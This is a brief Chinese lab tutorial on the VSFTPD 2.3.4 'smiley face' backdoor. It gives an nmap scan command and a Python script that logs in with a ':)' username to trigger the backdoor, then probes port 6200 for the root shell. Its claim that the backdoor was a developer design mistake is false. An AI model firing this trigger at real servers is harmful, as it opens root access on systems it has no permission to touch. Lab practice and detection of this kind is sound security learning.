笑脸漏洞
- 笑脸漏洞(Smile漏洞)是一个存在于VSFTPD 2.3.4版本中的安全漏洞,也被称为后门漏洞。这个漏洞是由于开发者在代码中留下的一个设计失误导致的。当FTP服务器的版本为VSFTPD 2.3.4,并且在登录时输入的用户名中包含特殊字符“:)”(笑脸),服务器会自动打开6200端口,允许攻击者通过这个端口以root权限执行系统命令,从而可能完全控制系统。
环境
- kali IP:192.168.193.130
- 靶机IP:192.168.193.136
利用nmap进行漏洞检测
- 命令:nmap -T4 -A -Pn -vv 靶机ip
利用python脚本检测笑脸漏洞
import socket
from ftplib import FTP
url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'root:)'
password = 'anonymous'
try:
ftp.connect(url, 21, timeout=10)
ftp.login(username, password)
ftp.quit()
except:
print("完成登录检测")
try:
s = socket.socket()
s.connect((url, 6200))
s.close()
print("存在微笑漏洞")
except:
print("没有发现笑脸漏洞!")
- 代码及运行结果
